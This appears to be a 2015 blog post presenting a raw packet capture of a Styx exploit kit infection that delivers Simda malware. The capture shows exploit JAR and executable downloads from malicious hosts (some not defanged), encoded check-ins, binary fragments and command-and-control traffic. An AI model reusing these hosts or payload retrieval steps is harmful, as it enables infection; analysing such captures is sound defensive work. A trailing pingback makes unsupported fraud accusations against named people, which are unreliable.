EK Styx Exploit Kit Loads Simda Proxyer Proxy Malware GET /?G1i917= report.* Domain Name

By | June 19, 2015

2014-03-15 00:05:11.815264 IP 192.168.1.104.54571 > 209.18.47.61.53: 4151+ A? transit.thundernova[.]ca. (40)
E..D……hQ…h../=.+.5.0t..7………..transit.thundernova[.]ca…..
2014-03-15 00:05:11.867429 IP 209.18.47.61.53 > 192.168.1.104.54571: 4151 1/0/0 A 204.27.57.194 (56)
E..T..@.7..9../=…h.5.+.@ ?.7………..transit.thundernova[.]ca……………….9.
2014-03-15 00:05:11.868340 IP 192.168.1.104.49507 > 204.27.57.194.80: Flags [S], seq 4100960480, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…”….h..9..c.P.o…….. . $…………..
2014-03-15 00:05:11.927367 IP 204.27.57.194.80 > 192.168.1.104.49507: Flags [S.], seq 3208407014, ack 4100960481, win 65535, options [mss 1460,nop,wscale 6,sackOK,eol], length 0
E..4.`@.1..u..9….h.P.c. 204.27.57.194.80: Flags [.], ack 1, win 16425, length 0
E..(..@…”….h..9..c.P.o… 204.27.57.194.80: Flags [P.], seq 1:445, ack 1, win 16425, length 444
E…..@…!+…h..9..c.P.o… 192.168.1.104.49507: Flags [P.], seq 1:119, ack 445, win 1026, length 118
E….a@.1..
..9….h.P.c. 204.27.57.194.80: Flags [P.], seq 1:450, ack 1, win 16425, length 449
E…..@…!….h..9..d.PyN……P.@)y…GET /WcLyBChoVsGiB/ToeBzl.html HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: transit.thundernova[.]ca
Connection: Keep-Alive

2014-03-15 00:05:12.298004 IP 204.27.57.194.80 > 192.168.1.104.49508: Flags [P.], seq 1:119, ack 450, win 1026, length 118
E….i@.1…..9….h.P.d….yN..P…%…HTTP/1.0 200 Ok
Server: CppCMS-Embedded/1.0.4
Connection: close
Content-Encoding: gzip
Content-Type: text/html
2014-03-15 00:05:14.684921 IP 192.168.1.104.49509 > 204.27.57.194.80: Flags [P.], seq 1:301, ack 1, win 16425, length 300
E..T..@…!….h..9..e.P. …2PcP.@)h…GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: transit.thundernova[.]ca
Connection: Keep-Alive

2014-03-15 00:05:14.730214 IP 204.27.57.194.80 > 192.168.1.104.49509: Flags [P.], seq 1:167, ack 301, win 1026, length 166
E….n@.1…..9….h.P.e.2Pc. ..P…k…HTTP/1.0 404 Not Found
Server: CppCMS-Embedded/1.0.4
Connection: close
Content-Encoding: gzip
Content-Type: text/html; charset=us-ascii
Status: 404 Not Found

2014-03-15 00:05:14.731119 IP 192.168.1.104.49509 > 204.27.57.194.80: Flags [F.], seq 301, ack 167, win 16383, length 0
E..(..@…”….h..9..e.P. …2Q P.?.N………
2014-03-15 00:05:14.731129 IP 204.27.57.194.80 > 192.168.1.104.49509: Flags [P.], seq 167:351, ack 301, win 1026, length 184
E….o@.1…..9….h.P.e.2Q . ..P…'”…………u..
.@.E…/…)…..Q`&1.-‘F.A……M-.]……1..”..8dP.7.>.w.x c.D$.0..@t..+.L+k.4w…..+.a..!.LwGqBMM..6./=E…>U…u)…H..e.|..F.^.!7.[.l.G.’..
…..:.’..c.1G…..s…..
2014-03-15 00:05:14.731131 IP 204.27.57.194.80 > 192.168.1.104.49509: Flags [F.], seq 351, ack 301, win 1026, length 0
E..(.p@.1..q..9….h.P.e.2Q.. ..P….@……..
2014-03-15 00:05:14.731132 IP 192.168.1.104.49509 > 204.27.57.194.80: Flags [R.], seq 302, ack 351, win 0, length 0
E..(..@…”….h..9..e.P. …2Q.P….>……..
2014-03-15 00:05:14.770416 IP 204.27.57.194.80 > 192.168.1.104.49509: Flags [F.], seq 351, ack 302, win 1026, length 0
E..(.q@.1..p..9….h.P.e.2Q.. ..P….?……d.
2014-03-15 00:05:19.638739 IP 192.168.1.104.49510 > 204.27.57.194.80: Flags [S], seq 2371901753, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…”….h..9..f.P.`Y9…… ……………..
2014-03-15 00:05:19.691035 IP 204.27.57.194.80 > 192.168.1.104.49510: Flags [S.], seq 1715225697, ack 2371901754, win 65535, options [mss 1460,nop,wscale 6,sackOK,eol], length 0
E..4.r@.1..c..9….h.P.ff 204.27.57.194.80: Flags [.], ack 1, win 256, length 0
E..(..@…”….h..9..f.P.`Y:f 204.27.57.194.80: Flags [P.], seq 1:294, ack 1, win 256, length 293
E..M..@…!….h..9..f.P.`Y:f 192.168.1.104.49510: Flags [P.], seq 1:110, ack 294, win 1026, length 109
E….s@.1…..9….h.P.ff 204.27.57.194.80: Flags [P.], seq 1:251, ack 1, win 256, length 250
E..”.,@…!….h..9..g.Pf..(…cP…H…GET /WcLyBChoVsGiB/gmkCPZN.jar HTTP/1.1
accept-encoding: pack200-gzip,gzip
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_33
Host: transit.thundernova[.]ca
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-03-15 00:05:19.987032 IP 204.27.57.194.80 > 192.168.1.104.49511: Flags [P.], seq 1:110, ack 251, win 1026, length 109
E….~@.1…..9….h.P.g…cf..”P…….HTTP/1.0 200 Ok
Server: CppCMS-Embedded/1.0.4
Connection: close
Content-Type: application/java-archive
2014-03-15 00:05:20.626723 IP 192.168.1.104.49512 > 204.27.57.194.80: Flags [P.], seq 1:235, ack 1, win 256, length 234
E….@@…!….h..9..h.Pj.[is2.nP…
…GET /WcLyBChoVsGiB/soft_1.exe&h=14 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_33
Host: 436sfdh.safebrowsing-cant-stop-me.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-03-15 00:05:20.665718 IP 204.27.57.194.80 > 192.168.1.104.49512: Flags [P.], seq 1:110, ack 235, win 1026, length 109
E…..@.1…..9….h.P.hs2.nj.\SP…S…HTTP/1.0 200 Ok
Server: CppCMS-Embedded/1.0.4
Connection: close
Content-Type: application/x-msdownload
2014-03-15 00:05:43.063778 IP 192.168.1.104.49525 > 79.142.66.240.80: Flags [P.], seq 1:618, ack 1, win 256, length 617
E….2@……..hO.B..u.P…X..\oP…….GET /?G1i917=%96%C9%D2%9F%D7%A9_%95%96g%A2i%AC%9A%98%9Bc%99%97%91%97%93%92h%96_%97%A5%9Exc%99%9DW%AE%E8%A2%E7%E5%A9%9A%A3%CE%95t%9Ce%B2h%95%8B%9D%CF%C8%9E%C6%CF%8E%88%84T%D0%D8%D1%84c%AEory%AA%99%B3%A2%A7%A4t%9Atg%ACt%BAh%95%9Ed%A7%A2%9A%93%A3%A5yh_%97%95%DF%AC%A4%A6iag%A2%95%A1%A6%A2%A4%5E%95bg%9Bc%A9g%93%95a%87%D7%9E%91%91%91ca_%A9%B2%93%B9%AB%A6oe%5B HTTP/1.1
Host: report.e17k3y7ce1aaaaaa31[.]com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

2014-03-15 00:05:43.063790 IP 192.168.1.104.49525 > 79.142.66.240.80: Flags [F.], seq 618, ack 1, win 256, length 0
E..(.3@……..hO.B..u.P……\oP….J……..
2014-03-15 00:05:43.063792 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [S], seq 514415991, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.4@……..hO.B..v.P..]w…… ……………..
2014-03-15 00:05:43.205689 IP 79.142.66.240.80 > 192.168.1.104.49525: Flags [.], ack 619, win 8135, length 0
E..(.=@.,. .O.B….h.P.u..\o….P…k……V..
2014-03-15 00:05:43.206696 IP 79.142.66.240.80 > 192.168.1.104.49525: Flags [P.], seq 1:367, ack 619, win 8212, length 366
E….>@.,…O.B….h.P.u..\o….P. ..+..HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 15 Mar 2014 04:03:00 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://www.bing[.]com/


301 Moved Permanently

301 Moved Permanently


nginx


2014-03-15 00:05:43.206700 IP 79.142.66.240.80 > 192.168.1.104.49525: Flags [F.], seq 367, ack 619, win 8212, length 0
E..(.?@.,. .O.B….h.P.u..]…..P. .i……n..
2014-03-15 00:05:43.206702 IP 192.168.1.104.49525 > 79.142.66.240.80: Flags [R.], seq 619, ack 367, win 0, length 0
E..(.5@……..hO.B..u.P……].P………….
2014-03-15 00:05:43.220928 IP 79.142.66.240.80 > 192.168.1.104.49526: Flags [S.], seq 1753673696, ack 514415992, win 65535, options [mss 1460,nop,wscale 3,sackOK,eol], length 0
E..4.C@.,…O.B….h.P.vh…..]x…..(…………..
2014-03-15 00:05:43.220938 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [.], ack 1, win 256, length 0
E..(.6@……..hO.B..v.P..]xh…P………….
2014-03-15 00:05:43.223425 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [P.], seq 1:609, ack 1, win 256, length 608
E….7@……..hO.B..v.P..]xh…P…….GET /?555qG5558=%96%C9%D2%9F%D7%A9_%95%96g%A2i%AC%9A%98%9Bc%99%97%91%97%93%92h%96_%97%A5%9Efge%D5m%AC%ABr%AF%E8%9C%96%E4%DB%D8k%96cp%9Ce%9F%A3%D1%CCn%C6%CF%8E%B6%B4%87%A0%9A%92%A0%A1%B2kvw%A9%7Bxhjh%B8%9A%B3%9F%B3%B5o%96cp%9Ey%BAp%95%A7u%A7%98%92%95%87%D3%98%A4k%93%9F%9Deej%A9weeei%A2%95%A0%9F%A2%A4%5E%95W%AD%A8c%A9g%93%95b%A7%A4%87%D3%DB%9EieR HTTP/1.1
Host: report.e17k3y7ce1aaaaaa31[.]com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

2014-03-15 00:05:43.223436 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [F.], seq 609, ack 1, win 256, length 0
E..(.8@…. …hO.B..v.P.._.h…P………….
2014-03-15 00:05:43.367404 IP 79.142.66.240.80 > 192.168.1.104.49526: Flags [.], ack 610, win 8136, length 0
E..(..@.,…O.B….h.P.vh….._.P………..f5
2014-03-15 00:05:43.368461 IP 79.142.66.240.80 > 192.168.1.104.49526: Flags [P.], seq 1:367, ack 610, win 8212, length 366
E…..@.,..GO.B….h.P.vh….._.P. ..v..HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 15 Mar 2014 04:03:00 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://www.bing[.]com/


301 Moved Permanently

301 Moved Permanently


nginx


2014-03-15 00:05:43.368472 IP 79.142.66.240.80 > 192.168.1.104.49526: Flags [F.], seq 367, ack 610, win 8212, length 0
E..(..@.,…O.B….h.P.vh..O.._.P. ………..
2014-03-15 00:05:43.368474 IP 192.168.1.104.49526 > 79.142.66.240.80: Flags [R.], seq 610, ack 367, win 0, length 0
E..(.9@……..hO.B..v.P.._.h..OP….”……..
2014-03-15 00:05:43.902871 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [S], seq 1800387166, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.:@…(….h…U.w.PkO.^…… ……………..
2014-03-15 00:05:44.056917 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [S.], seq 2424526948, ack 1800387167, win 65535, options [mss 1460,nop,wscale 3,sackOK,eol], length 0
E..4..@……..U…h.P.w..XdkO._………………..
2014-03-15 00:05:44.056927 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [.], ack 1, win 16425, length 0
E..(.;@…(….h…U.w.PkO._..XeP.@).P……..
2014-03-15 00:05:44.056929 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [P.], seq 1:297, ack 1, win 16425, length 296
E..P.<@...'q...h...U.w.PkO._..XeP.@)(...GET /flashupdate64.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 5.149.248.85 Connection: Keep-Alive 2014-03-15 00:05:44.203146 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 1:1461, ack 297, win 8212, length 1460
E…..@….d…U…h.P.w..XekO..P. .. ..HTTP/1.1 200 OK
Server: nginx
Date: Sat, 15 Mar 2014 04:05:44 GMT
Content-Type: application/octet-stream
Content-Length: 7058432
Last-Modified: Thu, 20 Feb 2014 22:17:00 GMT
Connection: keep-alive
Accept-Ranges: bytes

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2014-03-15 00:05:49.569803 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3144502:3145962, ack 297, win 8212, length 1460
E…..@….5…U…h.P.w..S.kO..P. ..6….fD…f.8..f.8..H…f.8..f.8…{…ff………A…A..K.D.W.M.[ A.W.f.8….A…M.[.u.f.8..A….(4$.(|$.D.(D$ D.(L$0H.d$XH.|$.H.t$…ff………H.|$.H.t$.H..H..H..L..L..L.D$(H..$8….)t$ .)|$0D.)D$@D.)L$PD.)T$`D.)\$pD.).$….D.).$….D.).$….D.).$….H……….E.o0fD.o=….1.fE.:…fD.:”……..A..fE…fE…fE.:”..M.Z.fE.:”..A..fE.:”..I..fE.:”..A..fE.:”..I..fE.:”..fD..$$fE.8..fD..l$.fE.8..fA.p..fA.p..fA.p.@H………..I..A..H…..fff………fA.p..fA…A…fA.p..fA…A..K.fA.p.@fA…fA….W.fA…fA…f…f.8..I.K f…f.8..fD.o-%…f…f.8..fD.o$$f…f.8..f……..f.8..f.8…(……..f.8..f.8….f.8..f.8..f.8..f.8….I.f.8..f.8..H.I f.8..f.8..f.8..f.8…..u.f.8..fE…f.8..fD..l$.f.8..fD..$$f.8..fD..l$.f.8..fE.8..f.8..fE.8..f.8..D…f.8..D..O.f.8..D..W f.8..D.._0f.8….O@f.8….GPH..`D.W.fA.p..D.W.fA.p..D…D.W.fA.p.@D..N.D.W.D..V .W.D..^0.W…N@..FPH.v`D..H…..Q…H….._…L…D..fA…D…H………fA…D..O…….fA.p..fA…D..W H………fA.p..fA…D.._0……fA….W……..O@D.W.D.W.D…D.W.D..N.D.W.D..V .W.D..^0..N@…..ffff………A…D…………..I.H.I .W.f.8…… H.I.u.f.8..D.W.D….}..D…W……D.W.D.W.D…D..N..]..D…k…D.W.D.W.D…D.W.D..N.D..V .7ffffff…………..D.W.D.W.D…D.W.D..N.D.W.D..V D..^0.(t$ .(|$0D.(D$@D.(L$PD.(T$`D.(\$pD.(.$….D.(.$….D.(.$….D.(.$….H..$….H.|$.H.t$…fffff………H.|$.H.t$.H..H..H..L..L..L.D$(L.L$0H..$…..)t$`.)|$pD.).$….D.).$….D.).$….D.).$….D.).$….D.).$….D.).$….D
2014-03-15 00:05:49.572568 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3145962:3147422, ack 297, win 8212, length 1460
E…..@….5…U…h.P.w..YNkO..P. ……).$….E..9A……D……A…A..H.M.@ D.W.fD.8….A…M.@.u.fD.8..I..D..I..H…fD.o.R…fE…fE.f.fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…H..`………..A……@.fE.p..fE.o.fE…..o.fE…..o_.fE…..og fA…..oo0fA…..ow@fA…..o.PH..`fA…A…fA…fA…A..K.f…f…fD…$f.8..I.K f…fD..\$.f.8..f…fD..d$ f.8..f…fD..l$0f.8..f……..fD..t$@f.8..fD..|$Pf.8..fE…fE.f..*f………f.8..f.8….f.8..f.8..f.8..f.8….I.f.8..f.8..H.I f.8..f.8..f.8..f.8…..u.fE.p..fE…fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8….I.fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8….A fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8..fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8..fE.p..fE…fE.o.fE….W.$fE….W\$.fE.f.fE….Wd$ ….Wl$0..^..Wt$@..f .W|$P..n0D….v@..~PH.v`H..`..a….D..L..A..H..`……H.. …………H..@..3…..}…fE.p..fE.o.fE…..o.fE…..o_.fE…..og fA…..oo0fA…..ow@H..PfA…fA…fA……..A.W.fE.o.A.W.A.W…..A.W….^.A.W….f …n0…v@H.vP.O…ffffff…………H…A.W……I.H.I .W.f.8…… H.I.u.f.8..A.W.fE.o….H.v……ffff………….._.H.. A.W.A.W..X…A.W.fE.o.A.W……^.H.v …..ff………….._…g H..0A.W.A.W.A.W……A.W.fE.o.A.W.A.W……^…f H.v0.nfffff………….._…g A.W…o0H..@A.W.A.W.A.W……A.W.fE.o.A.W.A.W….A.W…^…f ..n0H.v@..fffff..
2014-03-15 00:05:49.572580 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [.], ack 3147422, win 65335, length 0
E..(..@…$….h…U.w.PkO…._.P..7.M……..
2014-03-15 00:05:49.574145 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3147422:3148882, ack 297, win 8212, length 1460
E…..@….4…U…h.P.w.._.kO..P. .WJ………I…tYL…….N.H….F…H.v.H…u.L).L..D….V.A.W……I.H.I .W.f.8…… H.I.u.f.8..A.W…V..(t$`.(|$pD.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….H..$….H.|$.H.t$…ff………H.|$.H.t$.H..H..H..L..L..L.D$(L.L$0H..$…..)t$`.)|$pD.).$….D.).$….D.).$….D.).$….D.).$….D.).$….D.).$….D.).$….E..9A……D……A…A..H.M.@ D.W.fD.8….A…M.@.u.fD.8..1.H………H…H).I..D..I..H…fD.o.?…fE…fE.f.fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…fE.p..fE…fE.o.fE…fE…fE.f.fE…H..`………..A…..fE.p..fE.o.fE…..o.fE…..o_.fE…..og fA…..oo0fA…..ow@fA…..o.PH..`fA…A…fA…fA…A..K.f…f…fD…$f.8..I.K f…fD..\$.f.8..f…fD..d$ f.8..f…fD..l$0f.8..f……..fD..t$@f.8..fD..|$Pf.8..fE…fE.f..*f………f.8..f.8….f.8..f.8..f.8..f.8….I.f.8..f.8..H.I f.8..f.8..f.8..f.8…..u.fE.p..fE…fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8….I.fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8….A fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8..fE.p..fE…fE.o.fE…f.8..fE…f.8..fE.f.f.8..fE…f.8..f.8..f.8..fE.p..fE…fE.o.fE….W.$fE….W\$.fE.f.fE….Wd$ ….Wl$0..^..Wt$@..f .W|$P..n0D….v@..~PH.v`H..`..a….D..L..A..H..`..=…H.. …………H..@..S………fE.p..fE.o.fE…..o.fE…..o_.fE…..og fA…..oo0fA…..ow@H..PfA…fA…fA……..A.W.A.W.A.W…..A.W….^.A.W….f fE..
2014-03-15 00:05:49.575295 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3148882:3150342, ack 297, win 8212, length 1460
E…..@….4…U…h.P.w..d.kO..P. .Td……n0fE.f….v@H.vPfE.p..I………fE.o.fE…fE…fE….p…f..D…..H…A.W……I.H.I .W.f.8…… H.I.u.f.8..A.W.fE.o….fE.o.H.v………………._.H.. A.W.A.W……A.W.fE.o.A.W.fE.o……^.H.v …..f..D……._…g H..0A.W.A.W.A.W..P…A.W.fE.o.A.W.fE.o.A.W……^…f H.v0…..f..D..fE.p..fE.o.fE……fE….._.fE…..g A.W…o0H..@A.W.A.W.A.W……A.W.fE.o.A.W.fE.o.A.W….A.W…^…f ..n0H.v@..ffffff………I………L..L..D…..A.W……I.H.I .W.f.8…… H.I.u.f.8..A.W……G….H……N.H.v.H…u.L).L..D…..A.W……I.H.I .W.f.8…… H.I.u.f.8..A.W…..(t$`.(|$pD.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….D.(.$….H..$….H.|$.H.t$…f.H.|$.H.t$.H..H..H..L..L..L.D$(L.L$0H……..D……I..E……..A…D..H…rcH…..fffff…………H……..I..W.H.I .W.f.8…… H.I.u.f.8..D..L…..H.v.H…s.H…u A….6…H..H….f……H).1…f.H…D..H..L..H1……….H.d$..)4$.)|$.D.)D$ D.)L$0E…D..H..p..?…A..H..pD..D.)L$@……)D$@D…H.v………_…I.H.I ..og .W…oo0.W…ow@f.8..f…..o.Pf.8..f….D.oG`f.8..f….D.oOpf.8..f…..f.8..fD…f.8..fD……fD.8..fD.8….I………..G..WT$@.W…O .W…G0.W…O@.W…GP.W…O`D.W…GpD.W……^…f ..n0D….v@L….~PH……D..F`H.vpH…………A.(.D.(.H..p..b……C.D..H.v….D.(.H……….._..(.H.. ……..g .(.H..0……..o0H..@..5…..w@H..P..g……PH..`……D..G`D.)L$@.I……..G..WT$@.W…O .W…G0.W…O@.W…GP.W.D..O`D.W……^…f ..n0..v@..~PH.v`A.(.H..p…
2014-03-15 00:05:49.575306 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [.], ack 3150342, win 65335, length 0
E..(..@…$….h…U.w.PkO….jjP..7……….
2014-03-15 00:05:49.576246 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3150342:3151802, ack 297, win 8212, length 1460
E…..@….3…U…h.P.w..jjkO..P. .X…..ffff…………..I.H.I .W.f.8…… H.I.u.f.8..A.W.E.(.H….L…fff……….W..8…A.W.A.W….D.(..(.H.v.H.. …..f………….A.W.A.W…..W…^.D.(..(.H.v H..0…….D…….A.W.D..O0A.W…..W…^..W…f .(.H.v0H..@…..ffff……….W……..O…G A.W.A.W..W…O0.W.D..O@.W……^…f ..n0H.v@.(.H..P.Zf…………….O…G A.W.A.W..W…O0.W…G@.W.D..OP.W……^…f ..n0..v@H.vP.(.H..`..f.H…E…u……..)T$@H……H..H).H.t$@..f..(4$.(|$.D.(D$ D.(L$0H.d$XH.|$.H.t$…ffffff………H….g……..uNI.L..A….. …A…M.@.H.I.A….. f.8..f.8..M.@.H.I…A.A..H.L9.w.A…f.8…..H…..fff………H…H……H……..M…………W.I.@……………………………….. …A…f.:……..f.:……..f.:……..f.:……..f.:……..f.:.. .z…f.:..@.o…f.:….d…f.:….Y…f.:..6.N…….PP1..8……~Q……A…f.:….N…f.:….|…f.:….1…f.:….f…f.:……..f.:.. .P…f.:..@…..f.:….:…….P0H1……fff………..Q……H.@.A…A..P.f.:….&…f.:….4…f.:…. …f.:……..f.:……..f.:……..f.:……..f.:……..f.:……..f.:……..f.:.. …..f.:.. …..f.:..@………P.H1…H……H………..H.@……W……W……W…f….H.@..(…..f.o..W…..f.s…W.f.p.Uf…f…f.p..f………….(….D..(…N..X.H.@ ………….H.@……W……W……W…f….H.@……W……W……W………………………………………………….
…………………………………………………AES for Intel AES-NI,
2014-03-15 00:05:49.576594 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3151802:3153262, ack 297, win 8212, length 1460
E…..@….3…U…h.P.w..p.kO..P. ..f.. CRYPTOGAMS by ………VWSUATAUAVAW.H..@I…………..VWSUATAUAVAW.H..@I.@xI……I.q.M.Y8E..N…L9…|…I……E.S.N…L9…d…H.0I………….H.H.@X.H………..VWSUATAUAVAW.H..@I.@xI……L……L9…….I……L……L9…….H.p I………….H.H………..ffff………VWSUATAUAVAW.H..@I.@xI……I.q.M.Y8E..N…L9…….I……E.S.N…L9…….H.p`I………….H.H…….g…….VWSUATAUAVAW.H..@I……I……L..Z…L9.r5L..h…L9.r%L..G…L9.s.H.0I………….H.H.@X..I.@xH.x.H.p.I……I……I……I.y(L………H.L..H1.H.V.L..L.N.L.V(L.^8L.f.L.T$ L.\$(L.d$0H.L$8….<......H..@.A_A^A]A\][_^......................................................L..)/..fD.o.H.@.fA.o{PfE...fA...fD.8..fA...f.8..fA...f.8..fA...f.8..fA...f.8..fA...f.8..fA...f.8..f.8..fA.o;fE.oC.fD.o.f.s..fD.o.f.s..f...f...f...f...f...f.s..f...f.s..fA...fA...fD.o.f.s..fE.o.fA.s..f...fD...f...fD...f...f.s..fA...fA.s..fA...fE...fA.o{ fD.o.f.s..fD.o.f.s..f...f...fA...fA...f...f.s..f...f.s..fA...fA...fD.o.f.s..fE.o.fA.s..f...fD...fA...fE...f...f.s..fA...fA.s..fA...fE...fD.o.f.s..fD.o.f.s..f...f...f...f...f...f.s..f...f.s..fA...fA...fD.o.f.s..fE.o.fA.s..f...fD...f...fD...f...f.s..fA...fA.s..fA...fE...A...Y.fD..8f..@.fD.8..f..H f.8..f..P0f.8..f..X@f.8..f..`Pf.8..f..h`f.8..f..ppf.8..H......f.8..f...f...fA...f...fA...f...f...f...f...f...f...f...f...fD.o.fD.o.fD.o.fD.o.fD.o.fD...fD...fD...fE.o.fD...fA.o.fE...fE.o.fE...fE...fD...fE...fE...fA...fE...fD.o.fE 2014-03-15 00:05:49.576598 IP 192.168.1.104.49527 > 5.149.248.85.80: Flags [.], ack 3153262, win 65335, length 0
E..(..@…$….h…U.w.PkO….u.P..7.}……..
2014-03-15 00:05:49.577281 IP 5.149.248.85.80 > 192.168.1.104.49527: Flags [.], seq 3153262:3154722, ack 297, win 8212, length 1460
E…..@….2…U…h.P.w..u.kO..P. ……..fE…fE…fE…fD.o.fD.o.fD…fD…fE.o.fE…fE…fA…fE…fE…fE…fD.o.fA…fD.o.fE…fD.o.fD…fD.o.fE…fD…fD…fE…fE…fE…fA…fE.o.fE…fE…fD.o.fE.o.fE…fE…fE.o.fE…fD…fE…fE…fE.o.fD…fE…fE…fD…fE…fE…fE…fE…fD.o.f.o.fE.o.fE…fD…f…fA…fA…f…fA…fE…f…fE…fE…fE.o.fE.o.fE…fE…fE…fE…fD…fD…fA…fA…fE…fE…fA…fD…fE…fA…fA…fE…f…f…fD.o.f.o.fD…f…fE.o.fE.o.fE…fE…fE…fD…fD…f…fA…fA…fE…fA…fA…f…fE…fA…fE…fE…fE.o.fE…fD…f…fA…fA…f…fA…fA…fA…f…f…fA…f…f…fA…fD…f…f…f…f…f…f…A……..fA.p..fD.p..fD…fD.p..fA…fD.p..fA…fD…skipping…
2014-03-15 00:19:05.882253 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 260, win 255, length 0
E..(.T@… X…h6..K…9)M.PX-..P………….
2014-03-15 00:19:28.692079 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 260:389, ack 73, win 211, length 129
E…|.@./…6..K…h.9..X-..)M.PP….?………-.Q.M..%..R.h.q.._Y…..\.”.|..aE,.^…..w…….ZR=s…`…#’..#S.[W
………….%.b.v..P………O…………………
2014-03-15 00:19:28.890312 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 389, win 255, length 0
E..(.U@… W…h6..K…9)M.PX-..P………….
2014-03-15 00:19:54.632328 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 389:518, ack 73, win 211, length 129
E…|.@./…6..K…h.9..X-..)M.PP………….0…r…g…..e.
.w}j…D..J{….v.g..vu….\gg..}GA…j.u…….#SY`W
…..o…….%.b.v….k…….O…………………
2014-03-15 00:19:54.833842 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 518, win 254, length 0
E..(.V@… V…h6..K…9)M.PX-..P………….
2014-03-15 00:20:05.679157 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 518:519, ack 73, win 211, length 1
E..)|.@./…6..K…h.9..X-..)M.PP….@……$r
2014-03-15 00:20:05.892149 IP 192.168.1.104.49158 > 54.200.248.75.1337: Flags [.], ack 519, win 254, length 0
E..(.W@… U…h6..K…9)M.PX-..P………….
2014-03-15 00:21:05.679851 IP 54.200.248.75.1337 > 192.168.1.104.49158: Flags [P.], seq 519:520, ack 73, win 211, length 1

Share Button

One thought on “EK Styx Exploit Kit Loads Simda Proxyer Proxy Malware GET /?G1i917= report.* Domain Name

  1. Pingback: Margaret Cunniffe and David Brown are Australian Fraudsters based in Melbourne Victoria claim to raise money for charities via Synergize Vip Vip Club and Connect Network Fundraise but are nothing more than con-artists.

Leave a Reply

Your email address will not be published. Required fields are marked *